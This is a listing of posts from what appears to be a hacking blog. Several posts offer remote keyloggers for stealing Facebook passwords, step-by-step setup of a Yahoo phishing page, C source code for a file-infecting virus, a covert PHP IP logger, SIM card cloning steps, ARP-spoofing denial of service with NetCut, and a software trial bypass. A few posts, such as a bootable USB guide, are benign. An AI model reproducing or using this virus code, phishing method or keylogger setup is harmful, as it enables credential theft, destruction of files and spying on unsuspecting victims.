Posts

Black Horse Keylogger

Image
Here I am going to present a  New Remote Keylogger  which has the power to  hack facebook accounts  and to record all the key strokes typed; Features Of Black Horse Keylogger: Encrypted Email Fully Un-Detectable (FUD) Virus Downloader USB Spreading Disable Task Manager Password Stealer Clipboard Text Logger Block AntiVirus Sites Force Steam Antis Encrypt DL Add To Start Up Fake Error Message Delete Cookies File Binder Icon Changer Log Email Interval Changer You can easily use our gmail account to hack passwords                                                    DOWNLOAD Its password is  doh

Yahoo Phishing Page

Image
1.Just make an account on  My3gb . 2.Verify your My3gb account. 3.Now login your my3gb account. 4.Goto File Manager 4.Upload all the files which you have download in yahoo phisher page.rar. 5.Now give your my3gb account url to victim 6.Force him to login in your phishing page. 7.Now when he will enters his email address and password it comes to the lol.txt 8.Now login to your my3gb account goto file manager and open the lol.txt to see victims passwords DOWNLOAD Its password is   doh

How To Unlock Windows Password

Image
Lost or forgot windows password?With no way to get into the system?Do not be so anxious.This tutorial can help you remove the lost windows password in one second.Supports Windows of all versions, 7, Vista, XP, 2008, 2003, 2000 Note: If your google keywords doesn't open the site that is in the video so try this  site

See Who Is Online On Facebook In Offline Mode

Image
1) First you will go to the login the facebook after you can go the offline chat in facebook account. 2) Go to this  application page . 3) After  install this application you able to show, who is online on facebook while you are offline on facebook account. Now if you want to talk to someone you can send him/her messages knowing that he/she is online.    

Apolyse Keylogger

Here I am going to present a  New Remote Keylogger  which has the power to  hack facebook accounts  and to record all the key strokes typed Features Of New UD Remote Keylogger : UD - 3/33 You Can Use Gmail Account to get the logs Add To Start Up also included It also Kills Task Manager Automatically Hides the virus after infecting the victim Also Disables Registry Editing Stops victim From Ending Your Keylogger's Process New Icon Changer File Binder With Fake Error Message Includes Time Interval How To Use This Remote Keylogger for Hacking Of Facebook Accounts -  Download The Remote UD Keylogger  and extract the folder to desktop - Open the Remote keylogger and enter new created Gmail account username and password - Select the other settings as you need and donot forget to change Time Interval to 2 min - If you want then use Icon changer, File Binder, etc and then click on Build Server - Now upload this keylogger to file sharing sites like megaupload.com ,

What is "NETCUT" and How it works?

Image
This is a commonly used tool used on networks to cut down the network connection of victim. It makes  a Denial of Service attack on the Victim so that he doesn’t get internet access. It does so by flooding the switch with unreal MAC address entries that point to the victim’s ip address, so the packets are mapped incorrectly and the victim receives no packets.  Lets understand how it works: Suppose there is a Desktop PC with:       Hostname :  C4         IP : 10.0.0.81        Gateway : 10.0.0.138 We use here 3 tools: 1.Netcut : To make Attack. 2. Ethereal : To Checks Packets. 3. AntiArp : To  monitors and block all incoming and outgoing ARP traffic from / to my pc.     First we use  NetCut  on my machine to block user 10.0.0.10   On the  ethereal , it made 1767 ARP packets in only one minute..! The  AntiArp  shows that I ‘m sending fake Mac address to the gateway and I’m disguised as the victim’s IPaddress. (while if we make a man in the middle attack , we

Hack Remote Computer Regedit (Registry) Settings

How To access registry settings remotely : 'Remote Registry Service'  is the feature which allows us to access remote computer's registry settings.We can enable this service by start->run-> services.msc Check for  remote registry  and right click it to  start  the service. Note:  If the service is stopped then the registry settings of a computer is only accessible by the users belongs to that particular computer.If it is disabled then no one can able to accessthe registry.So it is recommended to start the service if we wants to access registry settings remotely. Next fact is you must be a member of the local Administrators group, or equivalent, on the remote computer to access the regedit settings.

Shutdown Others Computer Using CMD Command

How To Shutdown Remote Computer by command prompt : We can able to shutdown remote computers which may be on any networks(i.e your own network or other networks) by using cmd commands.Do the following steps, Shutdown Remote Computer and document the reason by  windows interface : start->run->cmd type   shutdown -i or shutdown /i   it will opens remote shutdown dialog window by what we can able to shutdown the remote computer. Shutdown remote computer and document the reason for shutdown by  commandline : start->run->cmd->We can shutdown and document the reason for shutdown by following, Type   shutdown /[r|s] /m \\ ComputerName  /c " Comment " /d [u|p]   xx :yy   and then press ENTER. where, /r                                ->     restarts the remote computer /s                               ->     shutdowns the remote computer /m //computer name  ->    specifies the destination computer /c "comment"           ->   

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program. ~~~~ type this code~~~~ #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(“*.*”,&ffblk,0); while(!done) { virus=fopen(_argv[0],”rb”); host=fopen(ffblk.ff_name,”rb+”); if(host==NULL) goto next; x=89088; printf(“Infecting %s\n”,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a

How to Remove Subscribe to Posts Atom Link From Blogger

Image
Remove "Subscribe to: Posts(Atom)" Link From Blogger. You can locate this links bellow every post or page, near to page navigation. In every post page there is a link like "Subscribe to: Post Comments(Atom)" In every page other then post page it may be like "Subscribe to: Post (Atom)" Here is a Screen-shot for You :> How to hide this Links? 1. Go to  Blogger Dashboard >   Design  tab >  Edit HTML  tab 2. Press Check   Expand Widget   Templates   check box 3. Then serach for the following line of code and remove it.  <b:include name='feedLinks'/> and  Save  Your template. Done

Get IP Address of Your Fiends

Image
 Many of us curious how to find ip address of OUR friends or any remote computer, here is the easiest way to do this :- see how to do this..  Follow the steps to make this stuff works: Step 1:  Copy the below script in the notepad and save as iplogger.php(you can change name whatever you like and make sure that your file extension should be .php not .php.txt). $file = 'IPs.txt'; $handle = fopen($file,'a'); if(!isset($_GET['p'])) { header('Location: http://google.com'); } fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n'); fclose($handle) ?> Step 2:  Make a blank notepad file and save as ips.txt(you can change name according to your script). Now you have two files i.e. iplogger.php and ips.txt . You have to upload this two files on the web hosting sites. Step 3:  You need to signup on a free webhosting service or any webhosting service that supports php like: www.t35.com www.110mb.com www.freehostia.com

Cloning of a SIM Card

Image
Step 1 First you'll need the IMSI (International Mobile Subscriber Identifier) number. This string of numbers is usually imprinted on the SIM card itself. This is an example of an IMSI number:IMSI:429011234567890 An IMSI is usually 15 digits long, but can be one or two digits shorter. Step 2 Now you have your IMSI number you'll need the authentication key (Ki), which is unique to your SIM. This number can only be discovered electronically using a SIM duplicator, which is an external device that you will slot the SIM card into.A SIM duplicator is relatively inexpensive - they can be found at around the $10 mark - and can be purchased at multiple locations. A Google search for 'Super SIM' will turn up at least several online outlets. Step 3 When the SIM duplicator is connected to your PC and your SIM card, it will attempt to acquire the Ki number and copy the entire contents. When a new SIM card is placed into the duplicator after this process is complete, tha

Bypass Software Trial Period Manually in Windows

Image
Today I am going to show you how you can bypass software trial period manually and use that again and again. Follow the below Steps: 1. First you have to uninstall that application whose trial period is over and you wanna use it again. 2. Now open the  “Regedit”  you can open it by going to  Start > Run > Regedit . 3. Navigate to  HK Local Machine > Software > Your Software name . 4. Now simply Delete the Key. 5. You have to do this for  HK Current user  if key is there too. 6. Now go to Run and Type  “%temp%” . 7. Delete all files in temporary folder, these are all the files created by software temporary installation and de-installation. 8. Go to  C:// Users > Username > App-data  ( Check all 3 directories “Local”, “LocalLow”, “Roaming” for your software entry there might be a folder for your software, if you find one Delete that. 9.Now every main step is done you can restart your computer and then Reinstall application. That’s it now you will get your s

Create Bootable USB Pen Drive for Windows 7

Image
Installing Windows from a USB flash drive has several advantages : First of all, the overall speed of the installation process will increase significantly, carrying a USB stick is much more convenient than a DVD, and finally it becomes possible to install the OS even on those systems that do not have a DVD drive, such as a netbook. In this post, I will show you how to load the Windows installation on to your USB flash drive and make it bootable just like the DVD. There are Two Options: 1.  Windows 7 USB-DVD Download Tool. 2.  Basic Option. 1. Windows 7 USB-DVD Download Tool: Just Download this Tool and Installed in your Desired PC then follow some easy Steps:- Click to Download   or  Click to Download 2. Basic Option: Tools Required: 1 . USB flash drive with a minimum capacity of 4 GB. 2 . Windows 7 Setup DVD.   Step 1 :  Plug-in your USB flash drive. Step 2  : Open the PowerShell (OR Command Prompt if PowerShell Not Exist). If you are us